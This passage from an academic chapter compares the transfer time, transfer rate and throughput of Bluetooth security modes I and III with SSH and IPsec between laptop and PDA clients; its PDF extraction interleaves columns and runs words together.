tions on Bluetooth security aspects, discovering an interesting research issue. On the other hand, as
numerous vulnerabilities and potential weaknesses Bluetooth wireless technology is targeting devices
and proposing solutions (Adam, 2003; Gehrmann, with particular needs and constraints (e.g., process-
& Nyberg, 2002; Jacobson & Wetzel, 2001; Persson ing power and battery consumption) the trade-offs
& Manivannan, 2003; Shaked & Wool, 2005). For between security services and performance must be
example, the Bluetooth pairing procedure has been carefully considered. Furthermore, considering that
anticipated to be weak under certain circumstances. radio links in general suffer from limited bandwidth
Moreover, other categories of threats, either active and are unreliable by nature, performance issues
or passive, have also been investigated, including must be thoroughly investigated to make a decision
ad hoc security issues, malicious software like whether certain security protocols and their mecha-
“Cabir,” war-nibbling, and so forth. nisms are advantageous over Bluetooth connections,
An obvious choice for any Bluetooth application delivering robust and agile security services within
would be to use Bluetooth encryption provided at tolerable service response times.
Figure 1. Sample scenario that mandates upper layer security

During the last few years, several researchers Experiments shall employ both Bluetooth native
have examined various Bluetooth security param- security mechanisms as well as the two aforemen-
eters and some of them do explore performance tioned protocols. Through a plethora of scenarios,
parameters (e.g., Chakraborty, 2000; De Morais utilizing both laptops and palmtops, we intend
Cordeiro, Sadok, & Agrawal, 2001; Francia, Kilaru, to offer a comprehensive in-depth comparative
Le Phuong, & Vashi, 2004; Golmie & Rebala, 2003; analysis of each of the aforementioned security
Howitt, 2002; Karnik & Kumar, 2000; Kitsos et mechanisms when deployed over Bluetooth com-
al., 2003; Lim et al., 2001; Miorandi, Caimi, & munication links.
Zanella, 2003; Wang, Arumugam, & Krishna, The rest of the chapter is structured as fol-
2002). However, to the best of our knowledge, none lows. The next section gives an overview of our
of these works focus on performance evaluation experimental test-bed related parameters and
comparing Bluetooth’s native security mechanisms procedures, while the third section presents the
with well-respected, strong security protocols like derived performance measurement results. The
IPsec and SSH. forth section offers an analytical discussion over
The chapter will focus on the performance of the conducted results. The chapter finishes wit
existing protocols and mechanisms rather than on some concluding thoughts and future directions
security itself, estimating the performance of both of this work.
the built-in Bluetooth security mechanisms, namely
security modes, and two other standard security
protocols operating at different layers of the TCP/IP ExPErIMEntAl frAMEwork
protocol suite, namely SSH and IPsec. Protocols dEscrIPtIon
likeSSHandIPsecproviderobust,exible, fl costless,
and easy to implement solutions for exchanging The experimental topology consists of two pairs
data over insecure communication links. However, of machines. The first pair of Bluetooth devices
although their deployment is a well established and employs a laptop and a palmtop machine, while
accustomed practice in the wireline world, more the other consists of two similar laptop machines.
research effort is needed for wireless links, due to The members of each pair are located at 10 meters
the several aforementioned limitations. Depending apart and connected via Bluetooth adapters (or
on the scenario involved, the user may utilize SSH built in Bluetooth chip), thus forming a small two-
or IPsec security services, either individually or member wireless PAN (WPAN) or piconet. The
in combination with Bluetooth security modes, main components’ characteristics, both software
allowing applications to communicate securely, and hardware, are presented in Table 1. To estimate
constructing a secure tunnel. Thus, in a sense, the the performance of the Bluetooth network, the data
whole procedure can also be seen as the deployment were transmitted from one network node (server)
of small VPNs in Bluetooth PANs. Note however, to the other (client). Hence, in order to record the
thattheefficiencyoftheSSHandIPSecdepends incoming and outcoming packets between the cor-
mainly on the performance of the used end-system. responding network entities and to calculate the
On the contrary, Bluetooth security native modes network performance parameters we utilized on
utilize the hardware encryption of the Bluetooth the server side the well known network analyzer
chip, thus performance depends heavily on the “ethereal” (www.ethereal.com), version 0.10.12,
chip per se. This situation will allow us to make which in turn uses the “tcpdump” tool. In addi-
several observations about different layer security tion, for the Linux environment, we employed
mechanisms when deployed over dissimilar user theBlueZofficialLinuxBluetoothprotocolstac
devices. (www.bluez.org), which provides support for the
Specifically, the chapter will evaluate several
core Bluetooth layers and protocols.
personal area network (PAN) parameters, includ- Bluetooth supports three different security
ing transfer times, link capacity, and throughput. modes called security modes I, II, and III, but in

our tests we decided to use only security modes DES

3 algorithms for confidentiality -in both ma
I and III. Security mode I offers no real security chines by installing IPsec-tools (http://ipsec-tools.
asauthenticationandconfidentiality services
sourceforge.net/) andare
Openswan (www.openswan.
disabled. On the other hand, security mode II org) as well. For SSH secured communication we
provides security services after the connection used OpenSSH. In fact, many open-source projects
between the two devices has been established and exist. In addition to FreeSWAN and openswan
only if a given application has requested them. which both enable IPsec in the Linux kernel,
Thus, the security services in mode II depend on openvpn (http://openvpn.net/) can be used to cre-
the application running. The last security mode is ate TLS-encrypted point-to-point connections.
the most powerful among the three modes because For SSH confidentiality services we chose four
itmandatesbothauthenticationand confidentiality
algorithms to test namely, 3DES, AES, Arcfour,
built-in mechanisms independently of the applica- and Blowfish. Finally, for both IPsec and SSH
tion running. These mechanisms are referred to we employed only symmetric cryptography and
as Bluetooth baseband security procedures, where manual keying procedures for the authentication of
the baseband layer deals with the SAFER+ algo- parties considering the fact that usually Bluetooth
rithms (Massey, Khachatrian, & Kuregian, 1998). piconets are formed ad hoc and their users do not
As implied, one of the terminals was acting as a holdpublickeycertificates.
client and the other one as the server. Therefore,
the server should require security and the client
should respond accordingly. PErforMAncE MEAsurEs
For IPsec, the engaged machines must have the
same security policies in order to communicate As mentioned before, the experimental procedure
securely.So,weconfiguredLinuxtouseMD5and consists of three main parts: evaluation of Bluetooth
SHA1 algorithms for data integrity and DES and built-in security modes I (no security), and III
Table 1. Hardware and software characteristics of the engaged machines

Laptop Server
RAM 256 MB
First pair
Palmtop Client
Model HPiPAQh540
Processor 400 MHz Intel XScale PXA250
RAM 64 MB
Operating System Familiar PDA OS 0.8.4
Bluetooth Adapter Bluetooth 1.1 compliant
Laptop client and server

Second
pair
RAM 256 Mbytes

(strong security), and estimation of the performance Achieved_Transfer_Rate(Kbps) = (bytes_

of IPsec and SSH mechanisms over Bluetooth links. sent + bytes_received) * 8) / TT
In all scenarios we gathered measurements for • Throughput represents the percentage of
the subsequent network performance parameters: Achieved_Transfer_Rate over the practical
absolutefiletransfertime(TT)achieved , transfer
maximum_transfer_rate of the link, which
rate (ATR), and throughput (THR). All measure- in our case is 723 Kbps:
ments took place at the server node because of its Throughput() % = achieved_transfer_rate /
processing power. max_transfer_rate * 100
• Finally, Achieved_Transfer_Rate_Improve-
• The Transfer_Time represents the actual ment is a comparison metric that indicates the
duration of transfers during a transaction. improvement of the Achieved_Transfer_Rate
• The Achieved_Transfer_Rate represents the with respect to the Bluetooth mode I achieved
actual transfer rate achieved during a trans- transfer rate Achieved_Transfer_Rate_B_I
action. In an ideal scenario, a constant data and is calculated as:
rate should be maintained between the two Achieved_Transfer_Rate_Improvement(%)
communication end-points. However, due to =ATR
( -ATR_B_I)/ATR_B_I0 *1
various reasons, mainly related to the wireless
medium nature, this parameter is changing A positive value implies that the performance
over time. We should underline the fact that (or channel throughput) has increased compared to
bytes_sent and bytes_received could also the Bluetooth mode I achieved transfer rate, while
contain retransmitted bytes. a negative one means that the performance has
Figure 2. Average metric values for network parameters measured/Bluetooth Modes I and III
transfer tim es (tt)

.
0.0
0.0
0.0 .
seconds
0.0
0.0
0.
0.0
Mode I
0.0
Mode III
.
0.0
. MB MB 0. MB MB
file size
throughput (tHr) Achieved transfer rate (Atr)

.0
. .0
. .
. .
.0
. .
.
Percentage (%)
0. 0.
.
. 0.0 0.
kbps
.
. .
. .0
.0
. .0
.
.
Mode I .0 .0 Mode I
. .
. Mode III Mode III
.
.0
.
. MB MB 0. MB MB
. MB MB 0. MB MB
file size
file size
0
decreased. Measurements were gathered during Moreover, encryption algorithms are applied
repeated FTP file transfers, between during the laptop
the transaction for mode III and as a result
server and the PDA client from the one hand and the overall transfer time is increased. We can also
between the laptop client and server from the other. perceivethatthelargerthefilesizeis,thelong
Each file was transferred twelve times the and only
TTdifference betweenmodeandmodeis
average values were recorded. In all scenarios, expected to be. This situation is also depicted in
the ping response times between client and server the respective plot of Figure 2. In general, these
were varying among 19.7 and 21.8msecs. Due measurements advocate that mode I utilizes the
to space limitations, in the following firstbetter
network three than mode III. Because of the
subsections we present only the analytical results volatile nature of the wireless link, we also report
derived from the laptop server/PDA client, which standard deviation (SD) for the measured values
is without doubt the most interesting one, while in Table 2.
some indicative corresponding comparisons with
the other laptop client–server pair is exhibited in secure shell (ssH) Evaluation
the subsection titled “Comparison Between PDA
and Laptop Clients.” Experimental procedures for the SSH mechanism
(IETF, 2006; OpenSSH, 2006) consider the transfer
bluetooth security Modes I and III ofthesamefourfiles,asbefore,betweentheclient
Evaluation and the server. Table 3 displays the average times
of all metrics used, while Table 4 presents the cor-
Measurements for testing Bluetooth modes I and responding standard deviation values.
IIIweregatheredbytransferringfourdifferent files
As we can notice, SSH gives highly increased
between each client–server pair. The files’times
transfer sizes when compared to Bluetooth secu-
were 5.26, 7.0, 10.5, and 15 Mbytes, respectively. rity modes. For instance, we can spot a difference
Figure 2 provides a graphical representation of of +12.6 seconds to +13.4 seconds for the small-
these values comparing TT times achieved in the est file depending on the cipher used. Moreover,
PDA client–laptop server piconet. As we can eas- it is more than obvious that all the ciphers used
ily notice, the results are generally as expected, are more or less of the same performance. This
but there are some interesting points which need is easily proven if we examine for example the
furtheranalysis.Atfirst,theTTmetric isslightly
achieved transfer rates in each case, which shown
higherformodeas , wellastheATRishigher forslight differences.
very
modeThis
. happensbecausemodeIIImandates Another interesting assumption that we can
authentication (handshake) at the beginning of each make is that as the size of the file increases, the
transaction. Keep in mind that the handshake time achieved transfer rate and the throughput become
is included in TT too. bigger. This happens because of the procedure of
the authentication which takes place during the ini-
Table 2. Standard deviation for all Bluetooth scenarios
MODE I MODE III

File Size (MB)
5.26 0.5 2.6 0.4 0.1 1.3 0.2
7 0.1 0.9 0.1 0.5 3.2 0.4
10.5 0.4 1.6 0.2 0.1 0.5 0.1
15 0.2 0.5 0.1 0.6 2.2 0.3

Table 3. Average values for network parameters measured (SSH)

5.26 MB 7 MB
3DES 90.1 526.4 72.8 116.9 555.6 76.9
AES128 90.2 525.6 72.7 116.9 556.2 76.9
Arcfour 90.5 523.8 72.5 117.3 554.2 76.6
Blowfish 90.5 523.6 72.4 117.6 552.8 76.4
10.5 MB 15 MB
3DES 163.0 581.8 80.5 221.3 603.2 83.4
AES128 162.9 582.4 80.5 221.3 603.6 83.5
Arcfour 163.1 581.6 80.5 221.6 602.4 83.3
Blowfish 162.8 582.6 80.6 222.1 601.2 83.1
Table 4. Standard deviation for all SSH scenarios

5.26 MB 7 MB
3DES 0.4 2.1 0.3 0.4 2.1 0.3
AES128 0.9 5.5 0.7 0.4 1.9 0.2
Arcfour 0.1 0.4 0.1 0.2 1.1 0.2
Blowfish 0.6 3.8 0.5 1.0 4.9 0.7
10.5 MB 15 MB
3DES 1.0 3.3 0.5 0.8 2.5 0.3
AES128 1.0 3.9 0.5 0.9 2.3 0.3
Arcfour 0.5 1.9 0.3 0.6 1.7 0.2
Blowfish 0.6 1.9 0.3 0.7 1.9 0.3
tial SSH handshake. In any case it should be noted and the server. IPsec uses two mechanisms (proto-
that the improvement in the achieved transfer rates cols) that may be used independently or jointly to
always compared to Bluetooth security mode I and securetheoutcomingtraffic,namelyauthenticati
induced by SSH, are negative for any scenario. This header (AH) offering data origin, connectionless
means that Bluetooth’s native mechanisms offer
better bandwidth and network utilization at almost
all cases examined. This remark is confirmed Tableby 5.%ATRdeteriorationforSSH
the values given in Table 5. Bluetooth
3DES AES128 RC4 Blowfish
Size Mode I
IPsec Evaluation 5.26 618.0 -14.8 -15.0 -15.2 -15.3
7 620.2 -10.4 -10.4 -10.6 -10.9
The procedure for the IPsec protocol (Kent & 10.5 621.2 -6.3 -6.2 -6.4 -11.0
Atkinson, 1998a, 1998b) considers once again the 15 621.4 -2.9 -2.9 -3.3 -3.3
transfer of the same four files between the client

TableAverage
6. valuesfornetworkparametersmeasured(IPsec)
5.26 MB 7 MB
AH_MD5 72.8 683.4 94.5 100.0 682.8 94.4
AH_SHA1 72.8 683.2 94.5 99.9 683.0 94.5
ESP_DES_MD5 74.4 681.0 95.0 102.0 686.6 95.0
ESP_3DES_MD5 73.8 681.0 95.7 102.2 685.2 94.8
ESP_DES_SHA1 74.2 680.0 95.2 102.0 686.6 95.0
ESP_3DES_SHA1 74.2 681.0 95.2 101.8 688.2 95.2
10.5 MB 15 MB
AH_MD5 145.9 682.6 94.4 205.2 683.4 94.5
AH_SHA1 145.7 683.4 94.5 205.1 683.8 94.6
ESP_DES_MD5 148.6 688.2 95.2 208.9 688.8 95.3
ESP_3DES_MD5 148.6 687.8 95.1 209.1 688.0 95.2
ESP_DES_SHA1 148.5 688.4 95.2 209.2 688.0 95.2
ESP_3DES_SHA1 148.6 688.0 95.2 210.5 683.6 94.6
Table 7. Standard deviation of measurements of all IPsec scenarios

5.26 MB 7 MB
AH_MD5 0.0 0.5 0.05 0.1 0.8 0.12
AH_SHA1 0.1 0.4 0.1 0.1 0.0 0.05
ESP_DES_MD5 0.1 0.4 0.1 0.3 2.1 0.28
ESP_3DES_MD5 0.5 4.5 0.6 1.3 8.6 1.19
ESP_DES_SHA1 0.0 0.4 0.06 0.6 3.7 0.53
ESP_3DES_SHA1 0.0 0.4 0.06 0.1 0.4 0.1
10.5 MB 15 MB
AH_MD5 0.1 0.5 0.06 0.2 0.5 0.08
AH_SHA1 0.2 0.9 0.1 0.1 0.4 0.03
ESP_DES_MD5 0.1 0.8 0.09 0.1 0.4 0.04
ESP_3DES_MD5 0.1 0.8 0.08 0.1 0.0 0.03
ESP_DES_SHA1 0.0 0.5 0.02 0.3 1.0 0.13
ESP_3DES_SHA1 0.1 0.7 0.06 2.4 7.6 1.05
data integrity, and optionally replay protection, vices. Note however that MD5 is not considered
and encapsulating security payload (ESP) offering secure anymore and is reported here for the sake of
confidentialityandprotectionagainst - trafficanaly
completeness. In total, we deployed six scenarios
sis. In our scenarios we utilized both mechanisms, as shown in Table 6.
using the MD5 and SHA1 algorithms for integrity First and foremost, all network metrics for IPsec
andDESandDES 3 tosupportconfidentiality - areser
remarkably concentrated. Standard deviation

values rendered in Table 7 confirm this remark.

comparison between PdA and
Surprisingly, IPsec gives better transfer times laptop clients
forallfilesizeswhencomparedtoBluetoothand
SSH.Thisisalsoconfirmedby%ATRimprove - Considering the second experimental pair, which
ment for IPsec shown in Table 8. In particular, all employs laptops for both the server and the client
IPsec times are very close to those of Bluetooth’s (see Table 1), TT times were better for all the cor-
mode I, while at the same time are considerably responding scenarios, namely Bluetooth native
better than SSH’s. Note, that IPsec renders 210.5 security modes, SSH and IPsec. For instance,
seconds as the highest time duration for transferring Bluetooth modes show a slight TT improvement
thebiggestfile,whilecorrespondinglyranging SSHgives from 1 to 3 seconds depending on the
222.1 seconds, mode III produces 213.2 seconds, file size. Specifically, TT for the 7 MB file was
and mode I 211.6 seconds. This is partially due 102.8 and 106.5 for Bluetooth mode I and III,
to substantially increased (and highly stabilized) respectively. Approximately the same situation is
bandwidth that IPsec generates. The aforemen- reported for SSH and IPsec as depicted in Figure
tionedobservationsarealsoconfirmed bythe
3. This factas the laptop client incorporates
is expected
that during IPsec measurements we had a very a faster CPU and thus gains more in cryptographic
low rate of packet loss reported by the Ethereal operations that SSH and IPsec mandate. The same
utility. It is important to note that the throughput remark is applied for the other two network per-
was better when using ESP. On the contrary, when formance parameters, throughput and ATR. As in
usingAH,thethroughputfortransferring the
the PDA files
client case, IPsec continues to perform
was lower. This can be explained by the fact that better under all circumstances for the laptop client
authentication is applied in AH. due to its throughput optimization. However, IPsec
TableATR
8.% improvementforIPsec
AH_ ESP_DES_ ESP_3DES_
File Bluetooth
MD5 SHA1 MD5 SHA1 MD5 SHA1
Size Mode_I
5.26 618.0 10.6 10.6 11.1 11.4 11.9 11.4
7 620.2 10.1 10.1 10.7 10.7 11.5 11.0
10.5 621.2 9.9 10.0 10.8 10.8 10.7 10.8
15 621.4 10.0 10.0 10.8 10.7 10.7 10.0
Figure 3. Comparison of network transfer times between Laptop and PDA clients
ssH transfer tim e (7 Mb) IPsec transfer tim e (7 Mb)
.0 0.
0.
. . 0.0
.0 0.0
. 0.0
. 0.
.0 0.
0.
seconds
0.
0.0
seconds
.0 Laptop client 0.0 0.0

00.
PDA client 00. 00.
.0
0. Laptop client
00.0 . PDA client
0.0
0. 0. 00.0
.
0.0
0. D A A
_M HA MD MD SH SH
0.0 AH _S S_ S_ S_ _
AH DE DE E ES
P_ P _ P _D _ D
DES AES Arcfour Blow fish ES ES ES SP
E

TT times remain very close to those of Bluetooth bits is encoded into a 15 bit codeword, and is capable
securitymodes.Thesamesituationisof confirmed
correcting single bit error in each block. Table
by the minimum standard deviation values that 9 shows the different ACL packet types and their
characterize the IPsec case. Also in this case, SSH properties. The values in the table are theoretical
gives the worst performance compared with IPsec without packet overhead. For example, over an
and Bluetooth native security modes. ACL link using DH5, one can send about 300 to
320 kbit/s of UDP user data, while the theoretical
limit is 433.9 kbit/s.
coMMEnts on tHE rEsults This means that in order to overcome the effect
of low and varying link quality on throughput,
This section provides a comparative view of the the selection of the optimal link layer packet size,
conducted results. Also, we attempt to provide a under estimated channel conditions, is crucial.
better explanation of the experiment outcomes. Indeed some research work (Chen, Kapoor, Sana-
But before that we must shortly discuss important didi, & Gerla, 2004) points this out by evaluating
characteristics of Bluetooth connections that may the “optimal” link layer packet size based on the
affect the performance of the connection. Bluetooth current bit error rate of the channel. Moreover, in
employs frequency hopping spread spectrum regions that Wi-Fi networks coexist with Bluetooth
(FHSS) to avoid interference. There are 79-23 in and because Wi-Fi and Bluetooth utilize spectrum
some countries-hopping frequencies, each having in different ways, they can cause considerable
a bandwidth of 1MHz. Frequency hopping is as- interference between each other (depending on
sisted with fast automatic repeat request ARQ)
( ,
the relative location of the 802.11b and Bluetooth
cyclic redundancy check (CRC), and forward error devices) (Yip & Kwok, 2004). By transmitting at
correction (FEC) to achieve high reliability on the the highest power level, Bluetooth class 1 devices
wireless links. All the data/control packet transmis- would create more interference than Bluetooth’s
sions are synchronized by the master. Slave units class 2 and class 3 devices, which transmit at
can only send in the slave-to-master slot after being lower power levels. Furthermore, because each
addressed in the preceding master-to-slave slot, Bluetooth PAN will occupy the entire ISM band,
with each slot lasting 625 microseconds. two or more coexisting Bluetooth PANs will oc-
For real-time data such as video, synchronous casionally collide, possibly causing loss of data
connection oriented (SCO) links are used, while packets. Of course, apart from implementation
for data transmission, asynchronous connectionless issues (e.g., protocol stacks), the aforementioned
link (ACL) links are employed. There are several parameters are closely related and can affect real
ACL packet types, differing in packet length and Bluetooth connections and the results gathered
whether they are FEC coded or not. The FEC cod- in this chapter. For instance, all experiments
ing scheme used in ACL DM mode is a shortened were conducted inside the coverage area of the
Hamming code, where each block of 10 information University’s hot-spot.
Table9.PackettypesforBluetoothACLConnections(theoreticalvalues)
Mode FEC Packet (bytes) Size (kbps) Symmetric (kbps) Asymmetric (kbps)
DM1 2/3 0-17 108.8 108.8 108.8
DM3 2/3 0-121 258.1 387.2 54.4
DM5 2/3 0-227 286.7 477.8 36.3
DH1 no 0-27 172.8 172.8 172.8
DH3 no 0-183 390.4 585.6 86.4
DH5 no 0-339 433.9 723.2 57.6

In the following, we present comparative graphs terminology). In addition to the protocol-level

only for two of the three network parameters, trans- handbrake, the SSH file transfer protocolSFTP) (
fer times, and throughput for the PDA client. As that runs on top of SSH contains its own handbrake.
already noted in “Comparison between PDA and This protocol recommends that reading and writing
Laptop Clients,” the laptop client scenario results is limited to less than 32K of data, even though it
are directly comparable with those of the PDA client is running over the reliable SSH transport which in
and thus do not contribute further to this discussion. turn runs over the reliable TCP/IP transport. One
Consequently, Figure 4 illustrates a comparison common implementation limits SFTP packets to
of the transfer times for six selected scenarios in 4K bytes, resulting in a mere 4% link utilization in
total. We easily spot that all times, especially for the previously-presented scenario.
filesizessmallerthanMB, 5. 0 1 seemtobehighlyFinally, Figure 5 depicts a comparison of the
concentrated. This means that (excluding SSH achievedthroughputforthespecificsixscenarios
ones) we have marginal differences between the This plot gives a clearer idea about the achieved net-
performances’ of the conducted scenarios. But, the work performance. In short, IPsec scenarios visibly
bigger the size gets, the difference tends to slightly have the best performance by far followed closely
decrease. Apart from the fact that all tests have by the two Bluetooth’s security modes. Moreover,
the Bluetooth link parameter in common, this can we can make a very important observation about
be explained by the fact that Bluetooth modes and the SSH’s performance. It is obvious that SSH’s
IPsec utilize the network better. throughputincreasesasthefile’ssizeincreases.T
On the downside, SSH does not always provide happens because of the handshaking phase which
peak network performance because it traditionally takes place during the initialization of each transac-
has been more focused on providing security. In tion.So,asthesizeofthetransferredfileincrease
a nutshell, SSHv2 introduced an additional form the impact of handshaking decreases and thus we
of ow
fl control that requires the receiver to
notice an ACK in the throughput. We should also
increase
each packet before more packets can be sent. Most report that the throughput of the other two scenarios
implementations seem to use packet sizes of 16K remainsmoreorlessstableforallthefilesizeswe
or occasionally 32K, with some going as low as utilized. Another important issue is that during
4K. This means that no matter how fast the link, the experiments we observed a significant rate of
every for example, at 16K the transmission stops for packet loss for both Bluetooth security modes and
one round trip time awaiting the other side to send SSH scenarios affecting their overall performance.
its ACK (referred to as a window adjust in SSHv2 Certainly, the main reason for this is the volatile
nature of the wireless connection itself.
Additionally, it is well known that the addition
Figure 4. Comparison of network transfer times of an IPSec header may cause IP fragmentation.
for six different scenarios (PDA client) However, the main concern in IPsec overhead is in
the encryption, decryption, and authentication of
0 Comparison of Transf er Times f or dif f erent scenarios
0 MODE I the actual IPsec (ESP and/or AH) packets. Tunnel
00 MODE III setup and rekeying occur much less frequently than
0
0
DES packet processing and, except in highly unusual
Blowf ish
0 circumstances, their overheads are not worth wor-
0 AH_SHA
Seconds
0
ESP_DES_SHA
rying about. According to some other works (e.g.,
0
0
FreeSwan, 2002) utilizing low-end machines, a
0 60 MHz Pentium running a host-to-host tunnel
0
00
to another machine shows an FTP throughput of
0 slightly over 5 Mbit/s either way. Thereafter, we
0 file sizes
0 can conclude that in our case the IPsec mechanisms
. MB MB 0. MB MB running on “relatively” low-end processors is not

really a bottleneck. The overall performance is protocol overhead induced. These screens illustrate
rather affected most by the quality of the Bluetooth the overall network statistics for Bluetooth mode III
link itself, meaning that due to better utilization of and IPsec AH_MD5, respectively. The “Data” sec-
the link and possibly due to optimal ACL scheme tion corresponds to the overall percent of data that
and lower packet drop rate, IPsec performs slightly were sent from the server towards the PDA client
better than native Bluetooth modes do. forthe6MB 2. 5 file.WeobservethatIPsecneeds
In Figure 6, we present some indicative ethereal considerably lower percent of TCP data packets to
screens that attest why in practice IPsec performs complete the transaction (49.63%) than Bluetooth
better from the other two in terms of the additional mode III which requires 66.24%. Note, that exclud-
ing ARP messages, the remaining percent corre-
sponds to control information sent from the client
Figure 5. Comparison of networkthroughputfor
to the server including ACKs, retransmissions, and
six different scenarios (PDA client)
so forth. Therefore, IPsec utilizes the link better,
Comparison of Throughput for different scenarios achieving higher performance.

Another important factor that may affect the

conducted results is the operating system itself. For

that we performed partial measurements using the
0
Windows XP operating system in the laptop client,

while keeping all the other test-bed parameters
unchanged. Under this setting, we observed sig-
Percentage (%)

nificantlylesserpacketretransmissionsandlog

fairly better times. For example, for Bluetooth mode

IIIandfilesizeMB 5. 0 1 wegotanaveragetransfer
0
MODE I time of 150 seconds, namely 5 seconds better than
MODE III
DES
Linux. One can presume that the Bluetooth stack

Blowf ish is better implemented in Windows than in Linux or
AH_SHA
ESP_DES_SHA
the Bluetooth adapters that we used perform better

. MB MB file sizes 0. MB MB
under Windows, perhaps due to their drivers’ imple-
mentation. Nevertheless, a detailed analysis of this
Figure6.Etherealscreenswithprotocolhierarchystatistics(PDAclient)

behavior between the two major operating systems AcknowlEdgMEnt

is necessary but left for future work. An additional
interesting research question is whether the recent We would like to thank Mr. Alexis Andreadis and
updates of the Bluetooth specification to version
Mr. Paganos Charalampos for helping us with the
that
2. 1 haveintroducedsignificantchanges network inmeasurements.
the
Bluetooth protocol stack, including optional ow fl
control, can affect the performance of the security
mechanisms under investigation (Misic, Chan, & rEfErEncEs
Misic, 2005). However, this is out of scope of the
current chapter. Adam, L. (2003). Serious flawsinBluetooth - secu
For the laptop client we also provide some in- rity lead to disclosure of personal data. Retrieved
dicative metrics concerning the physical memory October 14, 2007, from http://www.bluestumbler.
consumption for the three categories of scenarios. org
Morespecifically,memoryconsumption - forBlue
tooth modes I and III was 552 KB, which is the Bluetooth SIG. (2003, November 1). Specification
“pand” daemon. For SSH we have an additional of the Bluetooth system: Architecture & technol-
1920 KB, thus in total 2472 KB (“sshd” and “pand” ogy overview (Version 1.2). Retrieved October 14,
deamons), and finally for the IPsec case we2007, have from http://www.bluetooth.com
4027 KB (“pluto” and “pand” daemons). Chen, L., Kapoor, R., Sanadidi, M. Y., & Gerla,
M. (2004). Enhancing Bluetooth TCP throughput
via link layer packet adaptation. In Proceedings of
conclusIon And futurE work the IEEE ICC ’04 (Vol.7, pp. 4012-4016).
This chapter addresses performance issues for De Morais Cordeiro, C., Sadok, D., & Agrawal, D.
Bluetooth host-to-host connections. Three distinct P. (2001). Modeling and evaluation of Bluetooth
categories of scenarios were used to test whether MAC protocol. In Proceedings of Tenth Interna-
well respected security mechanisms of Internet tional Conference on Computer Communications
and application layers of the TCP/IP suite are ad- and Networks (pp. 518-522).
vantageous when deployed over Bluetooth PANs Francia, G., Kilaru, A., Le Phuong, & Vashi, M.
compared to Bluetooth native security modes. The (2004). An empirical study of Bluetooth perfor-
results disclose that IPsec better utilizes the wireless mance. In Proceedings of the 2nd Annual Confer-
link and thus provides radically improved transfer ence on Mid-South College Computing, ACM
times when compared with SSH. Native Bluetooth International Conference Proceeding Series (Vol.
modes service times are close to those of IPsec’s 61, pp. 81-93).
thus significantly better from SSH ones. On the
other hand, there is an important disadvantage FreeSwan. (2002). Performance of FreeSwan.
which is the high amount of the memory resources Retrieved October 14, 2007, from http://www.
IPsec consumes. freeswan.org/freeswan_trees/ freeswan-1.95/doc/
As future work we would like to expand this performance.html
study, investigating the performance of asymmetric Gehrmann, C., & Nyberg, K. (2002). Enhancements
cryptography mechanisms, for example, public key to Bluetooth baseband security. Ericsson Mobile
certificates,andtosupportauthentication services
Communcations in
AB, Ericsson Research.
the context of such protocols that promote automatic
keying. Another direction is to detect how much Gehrmann, C., Persson, J., & Smeets, B. (2004).
energy is required for this sort of secure connec- Bluetooth security. Artech House Publishers.
tions, as mobile devices can not afford batteries
Golmie, N., & Rebala, O. (2003). Techniques to im-
with unlimited capacity.
prove the performance of TCP in a mixed Bluetooth

and WLAN environment. In Proceedings of IEEE OpenSSH. (2006). OpenSSH project home page.
International Conference on Communications, Retrieved October 14, 2007, from http://www.
ICC, Anchorage, AK, (pp. 1181-1185). openssh.org
Howitt, I. (2002). Bluetooth performance in the Persson, K., & Manivannan, D. (2003). Secure con-
presence of 802.11b WLAN. IEEE Transactions nections in Bluetooth scatternets. In Proceedings of
onVehicularTechnology, 15
(6), 1640-1651. the63 th Annual Hawaii International Conference
on System Sciences (HICSS ‘03) (p. 314b).
IEEE. (2002). Wireless PAN medium access control
MACandphysicallayerPHYspecification. IEEE Shaked, Y., & Wool, A. (2005). Cracking the Blue-
standard.5 1 2.80 New York: IEEE. Retrieved Oc- tooth PIN. In Proceedings of the 3rd ACM Interna-
tober 14, 2007, from http://www.ieee802.org/15/ tional Conference on Mobile Systems, Applications,
and Services (pp. 39-50). ACM Press.
IETF. (2006). IETF secure shell (secsh) working
group. Retrieved October 14, 2007, from http:// Wang, F., Arumugam, N., & Krishna, G. H. (2002).
tools.ietf.org/wg/secsh/ Performance of a Bluetooth piconet in the presence
of IEEE 802.11 WLANs. In Proceedings of the
Jacobson, M., & Wetzel, S. (2001). Security weak-
13th IEEE International Symposium on Personal,
nesses in Bluetooth. In Proceedings of the Confer-
Indoor and Mobile Radio Communications (Vol.
ence on Topics in Cryptology: The Cryptographer’s
4, pp. 1742-1746).
track at RSA (LNCS 2020, pp. 176-191).
Yip, H. K., & Kwok, Y-K. (2004). A performance
Karnik, A., & Kumar, A., (2000). Performance
study of packet scheduling algorithms for coordi-
analysis of the Bluetooth physical layer. In Proceed-
nating colocated Bluetooth and IEEE 802.11b in
ings of IEEE International Conference on Personal
a Linux machine. In Proceedings of the 7th Inter-
Wireless Communications (pp. 70-74).
national Symposium on Parallel Architectures,
Kent, S., & Atkinson, R. (1998a). IP authentication Algorithms and Networks (ISPAN’04).
header (AH) (IETF RFC 2402).
Yujin, L., Jesung, K., Sang, L. M., & Joong, S. M.
Kent, S., & Atkinson, R. (1998b). IP encapsulating (2001). Performance evaluation of the Bluetooth-
security payload (ESP) (IETF RFC 2406). based public Internet access point. In Proceedings
ofthe5 1th International Conference on Information
Massey, J., Khachatrian, G., & Kuregian, M. (1998). Networking (pp. 643-648).
Nomination of SAFER+ as candidate algorithm for
the advanced encryption standard (AES). In Pro-
ceedings of the1st Advanced Encryption Standard
Candidate Conference. Retrieved October 14, 2007, kEy tErMs
from www.ee.princeton.edu/ ~rblee/safer+
Bluetooth: An industrial specification for
Miorandi, D., Caimi, C., & Zanella, A. (2003).
wireless personal area networks (PANs). Bluetooth
Performance characterization of a Bluetooth pi-
provides a way to connect and exchange infor-
conet with multi-slot packets. In Proceedings of
mation between devices such as mobile phones,
the WiOpt’ 03.
laptops, PCs, printers, digital cameras, and video
Misic, J., Chan, K. L., & Misic, V. B. (2005). TCP game consoles via a secure, globally unlicensed
trafficinBluetooth:Performance .2 1 and
- dimen
short-range radio frequency.
sioningofow fl control. In
Proceedings of WCNC
Goodput: The application level throughput,
’05 (pp. 1798-1804).
that is, the number of useful bits per unit of time

forwarded by the network from a certain source and IP header integrity (with some cryptography
address to a certain destination, excluding protocol algorithm also nonrepudiation). On the other hand,
overhead retransmissions, and so forth. the encapsulating security payload (ESP) protocol
provides data confidentiality, payload message) (
IEEE 802.15: The IEEE 802.15 WPAN working
integrity, and with some cryptography algorithm
group focuses on the development of consensus
also authentication.
standards for personal area networks or short dis-
tance wireless networks. These WPANs address Network Performance: The level of quality of
